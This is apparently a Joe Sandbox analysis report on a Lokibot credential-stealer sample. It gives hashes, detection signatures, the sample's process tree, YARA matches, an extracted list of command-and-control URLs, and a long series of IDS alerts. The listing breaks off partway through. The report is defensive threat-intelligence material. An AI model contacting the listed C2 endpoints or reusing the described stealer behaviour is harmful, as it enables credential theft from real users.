Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hfyhigXccT.exe

Overview

General Information

Sample Name:hfyhigXccT.exe
Analysis ID:651263
MD5:f0ddd6f32e65868acc9d38b35af0e2c5
SHA1:c0b1cb63866b3b2351a8f68d38e61284c0ed2874
SHA256:748eaf926943f0130b633506282d02f29da4d42d2172b3afce65246633994326
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • hfyhigXccT.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\hfyhigXccT.exe" MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
    • hfyhigXccT.exe (PID: 6752 cmdline: C:\Users\user\Desktop\hfyhigXccT.exe MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
    • hfyhigXccT.exe (PID: 6764 cmdline: C:\Users\user\Desktop\hfyhigXccT.exe MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gh20/fre.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x2f3ef:$des3: 68 03 66 00 00
        • 0x337e0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x338ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 43 entries
          SourceRuleDescriptionAuthorStrings
          0.2.hfyhigXccT.exe.4395410.11.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13278:$s1: http://
          • 0x16233:$s1: http://
          • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13280:$s2: https://
          • 0x13278:$f1: http://
          • 0x16233:$f1: http://
          • 0x13280:$f2: https://
          0.2.hfyhigXccT.exe.4395410.11.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.hfyhigXccT.exe.4395410.11.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.hfyhigXccT.exe.4395410.11.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            5.0.hfyhigXccT.exe.400000.14.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 126 entries
              No Sigma rule has matched
              Timestamp:104.155.55.2192.168.2.380497452025483 06/23/22-18:08:31.463728
              SID:2025483
              Source Port:80
              Destination Port:49745
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249896802825766 06/23/22-18:10:16.412962
              SID:2825766
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802024312 06/23/22-18:08:28.518392
              SID:2024312
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802024313 06/23/22-18:09:36.768062
              SID:2024313
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249773802025381 06/23/22-18:08:56.128163
              SID:2025381
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249787802024318 06/23/22-18:09:17.520239
              SID:2024318
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.852487532014169 06/23/22-18:09:36.710116
              SID:2014169
              Source Port:52487
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249745802025381 06/23/22-18:08:30.578499
              SID:2025381
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802024318 06/23/22-18:10:03.646769
              SID:2024318
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802024318 06/23/22-18:08:53.475797
              SID:2024318
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.850778532014169 06/23/22-18:08:56.029740
              SID:2014169
              Source Port:50778
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497492025483 06/23/22-18:08:35.758181
              SID:2025483
              Source Port:80
              Destination Port:49749
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802024313 06/23/22-18:08:53.475797
              SID:2024313
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249777802024313 06/23/22-18:09:04.362566
              SID:2024313
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.862547532014169 06/23/22-18:09:27.695746
              SID:2014169
              Source Port:62547
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249754802024318 06/23/22-18:08:45.504366
              SID:2024318
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802025381 06/23/22-18:09:22.064496
              SID:2025381
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249773802825766 06/23/22-18:08:56.128163
              SID:2825766
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802024313 06/23/22-18:08:45.504366
              SID:2024313
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802024313 06/23/22-18:09:08.917855
              SID:2024313
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249751802021641 06/23/22-18:08:43.382677
              SID:2021641
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802024313 06/23/22-18:09:27.755282
              SID:2024313
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802025381 06/23/22-18:09:11.023804
              SID:2025381
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802024313 06/23/22-18:10:03.646769
              SID:2024313
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802021641 06/23/22-18:10:09.603862
              SID:2021641
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.860640532014169 06/23/22-18:09:10.958098
              SID:2014169
              Source Port:60640
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249780802024318 06/23/22-18:09:08.917855
              SID:2024318
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802024313 06/23/22-18:08:34.891799
              SID:2024313
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802024318 06/23/22-18:08:34.891799
              SID:2024318
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864635532014169 06/23/22-18:10:03.591385
              SID:2014169
              Source Port:64635
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497732025483 06/23/22-18:08:56.994402
              SID:2025483
              Source Port:80
              Destination Port:49773
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864452532014169 06/23/22-18:08:47.827784
              SID:2014169
              Source Port:64452
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497752025483 06/23/22-18:09:00.835939
              SID:2025483
              Source Port:80
              Destination Port:49775
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497772025483 06/23/22-18:09:05.276468
              SID:2025483
              Source Port:80
              Destination Port:49777
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802025381 06/23/22-18:09:55.746969
              SID:2025381
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498072025483 06/23/22-18:09:22.916760
              SID:2025483
              Source Port:80
              Destination Port:49807
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802024317 06/23/22-18:08:28.518392
              SID:2024317
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497802025483 06/23/22-18:09:09.874479
              SID:2025483
              Source Port:80
              Destination Port:49780
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802021641 06/23/22-18:10:05.859589
              SID:2021641
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802825766 06/23/22-18:08:30.578499
              SID:2825766
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.849873532014169 06/23/22-18:08:34.825260
              SID:2014169
              Source Port:49873
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249775802825766 06/23/22-18:08:59.805159
              SID:2825766
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.863083532014169 06/23/22-18:10:09.542700
              SID:2014169
              Source Port:63083
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497502025483 06/23/22-18:08:41.569598
              SID:2025483
              Source Port:80
              Destination Port:49750
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802024313 06/23/22-18:09:59.728406
              SID:2024313
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497712025483 06/23/22-18:08:51.674694
              SID:2025483
              Source Port:80
              Destination Port:49771
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497542025483 06/23/22-18:08:46.411556
              SID:2025483
              Source Port:80
              Destination Port:49754
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802825766 06/23/22-18:09:11.023804
              SID:2825766
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.863861532014169 06/23/22-18:09:13.136252
              SID:2014169
              Source Port:63861
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249746802024318 06/23/22-18:08:32.826506
              SID:2024318
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802825766 06/23/22-18:09:55.746969
              SID:2825766
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802025381 06/23/22-18:08:50.748195
              SID:2025381
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802024318 06/23/22-18:09:27.755282
              SID:2024318
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802025381 06/23/22-18:08:48.152005
              SID:2025381
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498672025483 06/23/22-18:10:04.550873
              SID:2025483
              Source Port:80
              Destination Port:49867
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249750802825766 06/23/22-18:08:40.626646
              SID:2825766
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802024313 06/23/22-18:09:20.096905
              SID:2024313
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802024318 06/23/22-18:09:20.096905
              SID:2024318
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.865266532014169 06/23/22-18:08:43.324751
              SID:2014169
              Source Port:65266
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249743802025381 06/23/22-18:08:26.365310
              SID:2025381
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.855923532014169 06/23/22-18:08:26.293119
              SID:2014169
              Source Port:55923
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.38.8.8.857421532014169 06/23/22-18:08:32.768385
              SID:2014169
              Source Port:57421
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249895802024318 06/23/22-18:10:14.615169
              SID:2024318
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.859065532014169 06/23/22-18:09:47.565594
              SID:2014169
              Source Port:59065
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249895802024313 06/23/22-18:10:14.615169
              SID:2024313
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.852810532014169 06/23/22-18:08:53.418184
              SID:2014169
              Source Port:52810
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249783802825766 06/23/22-18:09:13.286095
              SID:2825766
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802025381 06/23/22-18:09:47.624966
              SID:2025381
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802024313 06/23/22-18:08:32.826506
              SID:2024313
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249787802024313 06/23/22-18:09:17.520239
              SID:2024313
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.859390532014169 06/23/22-18:09:02.005884
              SID:2014169
              Source Port:59390
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249778802025381 06/23/22-18:09:06.486197
              SID:2025381
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802024318 06/23/22-18:09:59.728406
              SID:2024318
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498952025483 06/23/22-18:10:15.552607
              SID:2025483
              Source Port:80
              Destination Port:49895
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498962025483 06/23/22-18:10:17.418004
              SID:2025483
              Source Port:80
              Destination Port:49896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802021641 06/23/22-18:08:28.518392
              SID:2021641
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802021641 06/23/22-18:09:36.768062
              SID:2021641
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.858625532014169 06/23/22-18:08:50.688333
              SID:2014169
              Source Port:58625
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497652025483 06/23/22-18:08:49.079457
              SID:2025483
              Source Port:80
              Destination Port:49765
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802021641 06/23/22-18:08:53.475797
              SID:2021641
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802024313 06/23/22-18:08:48.152005
              SID:2024313
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802825766 06/23/22-18:09:59.728406
              SID:2825766
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249751802025381 06/23/22-18:08:43.382677
              SID:2025381
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249775802024318 06/23/22-18:08:59.805159
              SID:2024318
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249776802825766 06/23/22-18:09:02.062353
              SID:2825766
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864412532014169 06/23/22-18:09:22.007803
              SID:2014169
              Source Port:64412
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.38.8.8.857442532014169 06/23/22-18:09:30.935127
              SID:2014169
              Source Port:57442
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249856802825766 06/23/22-18:09:47.624966
              SID:2825766
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802021641 06/23/22-18:08:45.504366
              SID:2021641
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249896802024313 06/23/22-18:10:16.412962
              SID:2024313
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.853802532014169 06/23/22-18:08:40.300507
              SID:2014169
              Source Port:53802
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249751802825766 06/23/22-18:08:43.382677
              SID:2825766
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802024313 06/23/22-18:10:09.603862
              SID:2024313
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802024318 06/23/22-18:10:09.603862
              SID:2024318
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249750802024313 06/23/22-18:08:40.626646
              SID:2024313
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497952025483 06/23/22-18:09:21.018222
              SID:2025483
              Source Port:80
              Destination Port:49795
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802021641 06/23/22-18:09:47.624966
              SID:2021641
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249750802024318 06/23/22-18:08:40.626646
              SID:2024318
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249773802021641 06/23/22-18:08:56.128163
              SID:2021641
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.855795532014169 06/23/22-18:09:59.580734
              SID:2014169
              Source Port:55795
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497512025483 06/23/22-18:08:44.299706
              SID:2025483
              Source Port:80
              Destination Port:49751
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802021641 06/23/22-18:09:59.728406
              SID:2021641
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249776802021641 06/23/22-18:09:02.062353
              SID:2021641
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.859795532014169 06/23/22-18:08:59.746955
              SID:2014169
              Source Port:59795
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249896802024318 06/23/22-18:10:16.412962
              SID:2024318
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249777802025381 06/23/22-18:09:04.362566
              SID:2025381
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498652025483 06/23/22-18:10:00.690473
              SID:2025483
              Source Port:80
              Destination Port:49865
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249783802025381 06/23/22-18:09:13.286095
              SID:2025381
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802021641 06/23/22-18:09:20.096905
              SID:2021641
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802025381 06/23/22-18:09:08.917855
              SID:2025381
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802025381 06/23/22-18:09:30.995615
              SID:2025381
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864589532014169 06/23/22-18:09:55.686777
              SID:2014169
              Source Port:64589
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249749802025381 06/23/22-18:08:34.891799
              SID:2025381
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802024318 06/23/22-18:09:55.746969
              SID:2024318
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249775802024313 06/23/22-18:08:59.805159
              SID:2024313
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802024313 06/23/22-18:09:55.746969
              SID:2024313
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802825766 06/23/22-18:08:45.504366
              SID:2825766
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497782025483 06/23/22-18:09:07.428229
              SID:2025483
              Source Port:80
              Destination Port:49778
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802825766 06/23/22-18:09:20.096905
              SID:2825766
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802025381 06/23/22-18:10:05.859589
              SID:2025381
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497812025483 06/23/22-18:09:11.937966
              SID:2025483
              Source Port:80
              Destination Port:49781
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802024318 06/23/22-18:09:36.768062
              SID:2024318
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802025381 06/23/22-18:09:41.932837
              SID:2025381
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802825766 06/23/22-18:08:32.826506
              SID:2825766
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.860195532014169 06/23/22-18:10:16.356290
              SID:2014169
              Source Port:60195
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497462025483 06/23/22-18:08:33.658945
              SID:2025483
              Source Port:80
              Destination Port:49746
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.858950532014169 06/23/22-18:09:41.871608
              SID:2014169
              Source Port:58950
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249778802024318 06/23/22-18:09:06.486197
              SID:2024318
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249775802021641 06/23/22-18:08:59.805159
              SID:2021641
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802021641 06/23/22-18:08:48.152005
              SID:2021641
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802024313 06/23/22-18:09:11.023804
              SID:2024313
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802024318 06/23/22-18:09:11.023804
              SID:2024318
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249895802025381 06/23/22-18:10:14.615169
              SID:2025381
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498792025483 06/23/22-18:10:06.706850
              SID:2025483
              Source Port:80
              Destination Port:49879
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802024318 06/23/22-18:08:30.578499
              SID:2024318
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.858116532014169 06/23/22-18:08:30.221090
